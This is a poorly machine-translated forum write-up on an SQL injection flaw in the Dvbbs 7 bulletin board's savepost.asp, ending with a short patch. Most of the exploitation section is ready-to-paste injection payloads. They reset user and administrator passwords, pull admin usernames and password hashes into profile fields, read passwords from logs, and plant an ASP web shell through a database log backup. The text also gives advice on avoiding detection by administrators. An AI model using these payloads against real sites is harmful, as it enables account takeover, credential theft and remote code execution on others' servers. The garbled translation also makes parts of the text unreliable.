I. Overview
Vulnerability Description:
| Http://coolersky.com/leak/programme/bbs/2006/0515/515.html |
A few days ago to listen to Hak_ban said someone put dvbbs7 a leak to release out, has never had time to see, the afternoon with Edward asked for a link to look at:
| http://www.eviloctal.com/forum/read.php?tid=22074 |
This site is:
| Http://coolersky.com/articles/hack/analysis/programme/2006/0515/238.html |
Look at the analysis of the prodigal son, feel that has been analyzed quite understand, but the group still have a few friends do not understand, simply in the local environment test loopholes, thanks to Keng provider, oh, really lazy to go online to find.
Second, vulnerability analysis
Since it issavepost.asp The problem of the program, then open the change file, the prodigal son has been mentioned is toolsbuyuser parameter filtering, then look at this variable.
32 lines, defining variables:
| Private Getposttype,tomoney,usetools,toolsbuyuser,getmoneytype,tools_usetools,tools_lastposttime,toolsinfo, Toolssetting |
111 Lines, empty
120 lines, in ParameterGetposttype is 0 o'clock, assign value
| Toolsbuyuser = "0| | | $SendMoney " |
123 lines, in ParameterGetposttype is 1 o'clock, assign value
| Toolsbuyuser = "0| | | $GetMoney " |
139 lines, in ParameterGetposttype is 2 o'clock, assign value
| Toolsbuyuser = "0@@@" &Buy_Orders& "@@@" &Buy_VIPType& "@@@" &Buy_UserList& "| | $PayMoney | | | " |
747 lines, defining SQL
| Sql= "INSERT INTO" &TotalUseTable& "(Boardid,parentid,username,topic,body,dateandtime,length,rootid,layer, Orders,ip,expression,locktopic,signflag,emailflag,isbest,postuserid,isupload,isaudit,ubblist,getmoney,usetools , Postbuyuser,getmoneytype) VALUES ("&Dvbbs.boardid&", "&ParentID&", ' "&username&", ' "& topic& "', '" &Content& "," "&DateTimeStr&" ', ' "&dvbbs.strlength (Content) &", "& rootid& "," &ilayer& "," &iorders& "," &Dvbbs.UserTrueIP& "', '" &expression (1) & "' , "&locktopic&", "&signflag&", "&mailflag&", 0, "&Dvbbs.userid&", "&ihaveupfile & ", &IsAudit&", ' "&UbblistBody&", "&ToMoney&", ' &UseTools& ', ' "& toolsbuyuser& "'," &GetMoneyType& ")" |
745 lines, executing SQL
We see that the Toolsbuyuser parameters are not securely filtered during the entire process of obtaining data to commit, resulting in SQL injection vulnerabilities.
third, loophole utilization
1,Registered User Coolersky
2, choose to publish a new topic
3, in "Select the type of posts" selected "Forum trading posts Set"
4, in the "Can buy user list limit:" Write
' Modify your user password to 123456
Coolersky ', 0); update dv_user set userpassword= ' 49ba59abbe56e057 ' where username= ' Coolersky ';-- |
After modifying the password, login to the forum, if the use of 123456 successful landing, then the vulnerability has not been patched.
5, access to the front desk administrator username and password, respectively, placed in a custom avatar and signature, view the user Coolersky basic information can be seen.
| Coolersky ', 0); Update dv_user set userface= (select top 1 username from Dv_user where userclass= ' Administrator '), usersign= (select top 1 userpassword from Dv_user where userclass= ' admin ' where username= ' Coolersky ';-- |
6. Get admin username and password
| Coolersky ', 0); Update dv_user set userface= (select top 1 username to dv_admin), usersign= (select top 1 password from Dv_ad min) where username= ' Coolersky ';-- |
7, through the log to view the background management password
| Coolersky ', 0); Update dv_user set usersign= (select L_content from Dv_log where l_content like '%password2% ') where username = ' Coolersky ';-- |
8, get the name of the database
| Coolersky ', 0); Update dv_user set userface= (select Db_name ()) where username= ' Coolersky ';-- |
9. Log differential backup Webshell
' Replace dbname for the database name obtained in the previous step, log differential backup to db_owner permissions!
' Replace d:\web\dvbbs7\ for current forum physical path, how to get don't ask me!
Coolersky ', 0); ALTER DATABASE dbname set RECOVERY full;create table Temptt (a image); backup log dbname to disk = ' C:\acool_ Back ' and Init;insert into TEMPTT (a) VALUES (' <%execute request ("L")%> '), BACKUP log dbname to disk = ' D:\web\dvbbs 7\temptt.asp ';d ROP table Temptt;alter database dbname set RECOVERY simple;-- |
Or
| Coolersky ', 0); ALTER DATABASE dbname set RECOVERY full;create table Temptt (a image); backup log dbname to disk = ' C:\acool_ Back ' and Init;insert into TEMPTT (a) values (0x273c2565786563757465207265717565737428226c2229253e27); BACKUP log dbname to disk = ' d:\web\dvbbs7\temptt.asp ';d ROP table Temptt;alter database dbname set RECOVERY simple;-- |
Use the minimum ASP Trojan Client connection can be!
10, directly modify the admin password
Through 5, 6, 73 steps to get the administrator before and after the user name and password, at least the password is 16-bit MD5, we can through the network query or brute force to get the administrator password to log in before and after the station, but also very likely not be able to crack export orders.
And if you can not get the forum's physical path, then have to modify the administrator password to achieve, of course, can not change the administrator password or try to avoid changes, or immediately be the administrator know was invaded.
(1) Get the user name of front desk administrator:
| Coolersky ', 0); Update Dv_user Set userface= (select top 1 username from Dv_user where userclass= ' Administrator ') where username= ' test ';-- |
(2) Modify the front desk Administrator password:
' Suppose we get the front desk admin username admin, change password to 123456
Coolersky ', 0); update dv_user set userpassword= ' 49ba59abbe56e057 ' where username= ' admin ';-- |
(3) Get admin username:
| Coolersky ', 0); Update Dv_user Set userface= (select top 1 username from dv_admin) where username= ' test '; |
(4) Modify the background Administrator password:
' Suppose we get the admin admin username and change the password to 123456
Coolersky ', 0); update dv_admin set password= ' 49ba59abbe56e057 ' where username= ' admin ';-- |
(5) Login to the foreground upload MDB constructed asp a word back door, backend for ASP or ASA file, how to operate not in this article described in the process.
By doing so, we can do more with the database as long as the server supports multiple statements.
Iv. Vulnerability Fixes
1, download the latest patch from Dvbbs
| Http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1 |
2, opensavepost.asp file, will be 747 lines
| Sql= "INSERT INTO" &TotalUseTable& "(Boardid,parentid,username,topic,body,dateandtime,length,rootid,layer, Orders,ip,expression,locktopic,signflag,emailflag,isbest,postuserid,isupload,isaudit,ubblist,getmoney,usetools , Postbuyuser,getmoneytype) VALUES ("&Dvbbs.boardid&", "&ParentID&", ' "&username&", ' "& topic& "', '" &Content& "," "&DateTimeStr&" ', ' "&dvbbs.strlength (Content) &", "& rootid& "," &ilayer& "," &iorders& "," &Dvbbs.UserTrueIP& "', '" &expression (1) & "' , "&locktopic&", "&signflag&", "&mailflag&", 0, "&Dvbbs.userid&", "&ihaveupfile & ", &IsAudit&", ' "&UbblistBody&", "&ToMoney&", ' &UseTools& ', ' "& toolsbuyuser& "'," &GetMoneyType& ")" |
modified to:
| Sql= "INSERT INTO" &TotalUseTable& "(Boardid,parentid,username,topic,body,dateandtime,length,rootid,layer, Orders,ip,expression,locktopic,signflag,emailflag,isbest,postuserid,isupload,isaudit,ubblist,getmoney,usetools , Postbuyuser,getmoneytype) VALUES ("&Dvbbs.boardid&", "&ParentID&", ' "&username&", ' "& topic& "', '" &Content& "," "&DateTimeStr&" ', ' "&dvbbs.strlength (Content) &", "& rootid& "," &ilayer& "," &iorders& "," &Dvbbs.UserTrueIP& "', '" &expression (1) & "' , "&locktopic&", "&signflag&", "&mailflag&", 0, "&Dvbbs.userid&", "&ihaveupfile & ", &IsAudit&", ' "&UbblistBody&", "&ToMoney&", ' &UseTools& ', ' "& Dvbbs.checkstr (Toolsbuyuser) & "", "&GetMoneyType&") " |
The DVBBS.CHECKSTR function is used to filter the Toolsbuyuser content.
